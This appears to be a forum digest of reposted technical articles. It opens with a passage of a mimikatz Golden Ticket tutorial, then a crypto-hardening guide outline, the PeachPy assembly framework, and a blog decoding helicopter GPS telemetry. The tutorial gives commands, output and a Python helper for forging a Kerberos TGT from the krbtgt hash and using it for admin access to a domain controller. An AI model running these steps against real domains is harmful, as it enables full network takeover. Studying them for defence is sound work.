- Domain's SID
- Username that we'd like to impersonate

As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while. As you know, mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets, we can easily replay those on another computer and get access to the same resource. See Google for more info.

[h=2]Attack[/h]

When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example. First we look for a domain administrator:

C:\Users\evilhacker>net group "domain admins" /domain
The request will be processed at a domain controller for domain ctu.domain.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
Administrator            schema.Admin             Jack.Bauer

Administrator is good for us, so we create a TGT ticket with the krbtgt user's hashed password and make it look as if Administrator asked for access to a share. Now let's get the Domain SID.
Easiest way to do that is just to use "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe comes in handy:

C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN

PsGetSid v1.44 - Translates SIDs to names and vice versa
Copyright (C) 1999-2008 Mark Russinovich
Sysinternals - www.sysinternals.com

SID for CTU.DOMAIN\CTU.DOMAIN:
S-1-1-12-123456789-1234567890-123456789

Now we have everything to start the attack. First we list the existing Kerberos tickets; if there are any, we can purge those with the purge command (but it is not necessary), and then we can create the Golden Ticket and pass that.

C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe

  .#####.    mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17)
 .## ^ ##.
 ## / \ ##   /* * *
 ## \ / ##    Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'    http://blog.gentilkiwi.com/mimikatz                    (oe.eo)
  '#####'                                     with 14 modules        * * */

mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : evilhacker @ CTU.DOMAIN
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ; ...

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

Admin  : Administrator
Domain : CTU.DOMAIN
SID    : S-1-1-12-123456789-1234567890-123456789
krbtgt : deadbeefboobbabe003133700009999
Ticket : Administrator.kiribi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
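To recap which pieces from the list above end up where, here is a small helper that assembles the kerberos::golden command line. This is purely illustrative (the helper function is my own, not part of mimikatz); the values are the example values from this walkthrough.

```python
# Hypothetical helper: build the mimikatz kerberos::golden command
# from the four ingredients gathered earlier in the post.
def golden_ticket_cmd(admin, domain, sid, krbtgt_hash, ticket_file):
    # mimikatz takes space-separated /key:value arguments
    return ("kerberos::golden /admin:%s /domain:%s /sid:%s "
            "/krbtgt:%s /ticket:%s"
            % (admin, domain, sid, krbtgt_hash, ticket_file))

cmd = golden_ticket_cmd(
    "Administrator",                               # user to impersonate
    "CTU.DOMAIN",                                  # domain name
    "S-1-1-12-123456789-1234567890-123456789",     # domain SID
    "deadbeefboobbabe003133700009999",             # krbtgt NTLM hash
    "Administrator.kiribi")                        # output ticket file
print(cmd)
```

The printed string matches the kerberos::golden invocation used in the transcript below.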
mimikatz # kerberos::ptt Administrator.kiribi
Ticket 'Administrator.kiribi' successfully submitted for current session

mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : Administrator @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

mimikatz # kerberos::tgt
Keberos TGT of current session :
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Service Name (02) : krbtgt ; CTU.DOMAIN ; @ CTU.DOMAIN
   Target Name  (--) : @ CTU.DOMAIN
   Client Name  (01) : Administrator ; @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
   Session Key  (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37
   Ticket  (00 - 17) : [...]

   (NULL session key means allowtgtsessionkey is not set to 1)

Now you can mount any share or use any RPC-related tool that you like.

C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$
The command completed successfully.

C:\Users\evilhacker\Documents\mimikatz>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           I:        \\dc01.ctu.domain\c$      Microsoft Windows Network
The command completed successfully.

OR

C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe

PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
DC01

C:\Windows\system32>exit
cmd.exe exited on dc01.ctu.domain\ with error code 0.

Some additional notes:

- mimikatz does not require SE_DEBUG or other privileges to create and pass the TGT

[h=2]Mitigation[/h]

I am not aware of any good mitigation for this. Please let me know if you do.
[h=2]Greetings[/h] Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz [h=2]Author[/h] Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - rycon.hu - 2014. 01. 24. Sursa: rycon.hu - mimikatz's Golden Ticket
-
Applied Crypto Hardening

Wolfgang Breyha, David Durvaux, Tobias Dussa, L. Aaron Kaplan, Florian Mendel, Christian Mock, Manuel Koschuch, Adi Kriegisch, Ulrich Pöschl, Ramin Sabet, Berg San, Ralf Schlatterbeck, Thomas Schreck, Aaron Zauner, Pepi Zawodsky (University of Vienna, CERT.be, KIT-CERT, CERT.at, A-SIT/IAIK, coretec.at, FH Campus Wien, VRVis, MilCERT Austria, A-Trust, Runtux.com, Friedrich-Alexander University Erlangen-Nuremberg, azet.org, maclemon.at)

Draft revision: d6ea268 (2014-01-29 21:09:52 +0100)

Contents

1. Introduction
   1.1. Audience
   1.2. Related publications
   1.3. How to read this guide
   1.4. Disclaimer and scope
   1.5. Methods
2. Practical recommendations
   2.1. Webservers
      2.1.1. Apache
      2.1.2. lighttpd
      2.1.3. nginx
      2.1.4. MS IIS
   2.2. SSH
      2.2.1. OpenSSH
      2.2.2. Cisco ASA
      2.2.3. Cisco IOS
   2.3. Mail Servers
      2.3.1. SMTP in general
      2.3.2. Dovecot
      2.3.3. cyrus-imapd
      2.3.4. Postfix
      2.3.5. Exim (based on 4.82)
   2.4. VPNs
      2.4.1. IPsec
      2.4.2. Check Point FireWall-1
      2.4.3. OpenVPN
      2.4.4. PPTP
      2.4.5. Cisco ASA
      2.4.6. Openswan
   2.5. PGP/GPG - Pretty Good Privacy
   2.6. IPMI, ILO and other lights out management solutions
   2.7. Instant Messaging Systems
      2.7.1. General server configuration recommendations
      2.7.2. ejabberd
      2.7.3. Chat privacy - Off-the-Record Messaging (OTR)
      2.7.4. Charybdis
      2.7.5. SILC
   2.8. Database Systems
      2.8.1. Oracle
      2.8.2. MySQL
      2.8.3. DB2
      2.8.4. PostgreSQL
   2.9. Intercepting proxy solutions and reverse proxies
      2.9.1. squid
      2.9.2. Pound
3. Theory
   3.1. Overview
   3.2. Cipher suites
      3.2.1. Architectural overview
      3.2.2. Forward Secrecy
      3.2.3. Recommended cipher suites
      3.2.4. Compatibility
      3.2.5. Choosing your own cipher suites
   3.3. Random Number Generators
      3.3.1. When random number generators fail
      3.3.2. Linux
      3.3.3. Recommendations
   3.4. Keylengths
   3.5. A note on Elliptic Curve Cryptography
   3.6. A note on SHA-1
   3.7. A note on Diffie Hellman Key Exchanges
   3.8. Public Key Infrastructures
      3.8.1. Certificate Authorities
      3.8.2. Hardening PKI
A. Tools
   A.1. SSL & TLS
   A.2. Key length
   A.3. RNGs
   A.4. Guides
B. Links
C. Suggested Reading
D. Cipher Suite Name Cross-Reference
E. Further research

Download: https://bettercrypto.org/static/applied-crypto-hardening.pdf
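The "Recommended cipher suites" and "Forward Secrecy" chapters are the heart of the guide. As a quick sketch of the idea (my own example, not taken from the guide): restricting a TLS stack to ECDHE key exchange with AEAD ciphers yields a forward-secret configuration, which Python's ssl module lets you inspect directly. The exact suites listed depend on the OpenSSL build linked into Python.

```python
# Restrict a TLS context to forward-secret AEAD suites and list what
# survives. "ECDHE+AESGCM" is an OpenSSL cipher-string expression:
# ECDHE key exchange (forward secrecy) AND AES-GCM (AEAD).
import ssl

ctx = ssl.create_default_context()
ctx.set_ciphers("ECDHE+AESGCM")

names = [c["name"] for c in ctx.get_ciphers()]
print(names)
```

Running this prints only ECDHE-based AES-GCM suites (plus, on newer Python/OpenSSL, the TLS 1.3 suites, which are always forward-secret).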
-
[h=1]Portable Efficient Assembly Code-generator in Higher-level Python (PeachPy)[/h]

PeachPy is a Python framework for writing high-performance assembly kernels. PeachPy is developed to simplify writing optimized assembly kernels while preserving all optimization opportunities of traditional assembly. Some PeachPy features:

- Automatic register allocation
- Stack frame management, including re-aligning of stack frame as needed
- Generating versions of a function for different calling conventions from the same source (e.g. functions for Microsoft x64 ABI and System V x86-64 ABI can be generated from the same source)
- Allows to define constants in the place where they are used (just like in high-level languages)
- Tracking of instruction extensions used in the function
- Multiplexing of multiple instruction streams (helpful for software pipelining)

[h=2]Installation[/h]

PeachPy can be installed from PyPI:

pip install PeachPy

from peachpy.x64 import *

# Use 'x64-ms' for Microsoft x64 ABI
abi = peachpy.c.ABI('x64-sysv')
assembler = Assembler(abi)

# Implement function void add_1(const uint32_t *src, uint32_t *dst, size_t length)
src_argument = peachpy.c.Parameter("src", peachpy.c.Type("const uint32_t*"))
dst_argument = peachpy.c.Parameter("dst", peachpy.c.Type("uint32_t*"))
len_argument = peachpy.c.Parameter("length", peachpy.c.Type("size_t"))

# This optimized kernel will target Intel Nehalem processors. Any instructions which are not
# supported on Intel Nehalem (e.g. AVX instructions) will generate an error. If you don't have
# a particular target in mind, use "Unknown"
with Function(assembler, "add_1", (src_argument, dst_argument, len_argument), "Nehalem"):
    # Load arguments into registers
    srcPointer = GeneralPurposeRegister64()
    LOAD.PARAMETER( srcPointer, src_argument )
    dstPointer = GeneralPurposeRegister64()
    LOAD.PARAMETER( dstPointer, dst_argument )
    length = GeneralPurposeRegister64()
    LOAD.PARAMETER( length, len_argument )

    # Main processing loop. Length must be a multiple of 4.
    LABEL( 'loop' )
    x = SSERegister()
    MOVDQU( x, [srcPointer] )
    ADD( srcPointer, 16 )

    # Add 1 to x
    PADDD( x, Constant.uint32x4(1) )

    MOVDQU( [dstPointer], x )
    ADD( dstPointer, 16 )

    SUB( length, 4 )
    JNZ( 'loop' )

    RETURN()

print assembler

Sursa: https://bitbucket.org/MDukhan/peachpy
-
[h=3]Mystery signal from a helicopter[/h] Last night, YouTube suggested a video for me. It was a raw clip from a news helicopter filming a police chase in Kansas City, Missouri. I quickly noticed a weird interference in the audio, especially in the left channel, and thought it must be caused by the chopper's engine. I turned up the volume and realized it's not interference at all, but a mysterious digital signal! And off we went again. The signal sits alone on the left audio channel, so I can completely isolate it. Judging from the spectrogram, the modulation scheme seems to be BFSK, switching the carrier between 1200 and 2200 Hz. I demodulated it by filtering it with a lowpass and highpass sinc in SoX and comparing outputs. Now I had a bitstream at 1200 bps. The bitstream consists of packets of 47 bytes each, synchronized by start and stop bits and separated by repetitions of the byte 0x80. Most bits stay constant during the video, but three distinct groups of bytes contain varying data, marked blue below: What could it be? Location telemetry from the helicopter? Information about the camera direction? Video timestamps? The first guess seems to be correct. It is supported by the relationship of two of the three byte groups. If the first 4 bits of each byte are ignored, the data forms a smooth gradient of three-digit numbers in base 10. When plotted parametrically, they form an intriguing winding curve. It is very similar to this plot of the car's position (blue, yellow) along with viewing angles from the helicopter (green), derived from the video by magical image analysis (only the first few minutes shown): When the received curve is overlaid with the car's location trace, we see that 100 steps on the curve scale corresponds to exactly 1 minute of arc on the map!
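The tone-comparison demodulation described above (lowpass vs. highpass sinc in SoX) can be sketched per bit period with a Goertzel filter: whichever tone carries more energy in a 1/1200 s window decides the bit. The 48 kHz sample rate and the Bell-202-style mapping (1200 Hz = mark = 1) are my assumptions here, not stated in the post.

```python
import math

FS = 48000                     # sample rate (assumed)
BAUD = 1200                    # bit rate from the post
F_MARK, F_SPACE = 1200, 2200   # BFSK tones from the spectrogram
SPB = FS // BAUD               # samples per bit (40)

def goertzel_power(block, freq):
    """Energy of one tone in a block (Goertzel algorithm)."""
    k = round(len(block) * freq / FS)          # nearest DFT bin
    coeff = 2.0 * math.cos(2.0 * math.pi * k / len(block))
    s1 = s2 = 0.0
    for x in block:
        s1, s2 = x + coeff * s1 - s2, s1
    return s1 * s1 + s2 * s2 - coeff * s1 * s2

def modulate(bits):
    """Synthesize a BFSK signal so we can test the demodulator."""
    samples = []
    for b in bits:
        f = F_MARK if b else F_SPACE
        samples.extend(math.sin(2.0 * math.pi * f * n / FS) for n in range(SPB))
    return samples

def demodulate(samples):
    """Decide each bit by comparing the two tone energies."""
    bits = []
    for i in range(0, len(samples) - SPB + 1, SPB):
        block = samples[i:i + SPB]
        bits.append(1 if goertzel_power(block, F_MARK) >
                         goertzel_power(block, F_SPACE) else 0)
    return bits

bits = [0, 1, 1, 0, 1, 0, 0, 1]
decoded = demodulate(modulate(bits))
print(decoded)
```

A real decoder would also have to find bit boundaries (the start/stop bits mentioned above help with that); this sketch assumes perfect alignment.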
Using this relative information, and the fact that the helicopter circled around the police station in the end, we can plot all the received data points in Google Earth to see the location trace of the helicopter: Update: Apparently the video downlink to ground was transmitted using a transmitter similar to Nucomm Skymaster TX that is able to send live GPS coordinates. And this is how they seem to do it. Posted by Oona Räisänen Sursa: absorptions: Mystery signal from a helicopter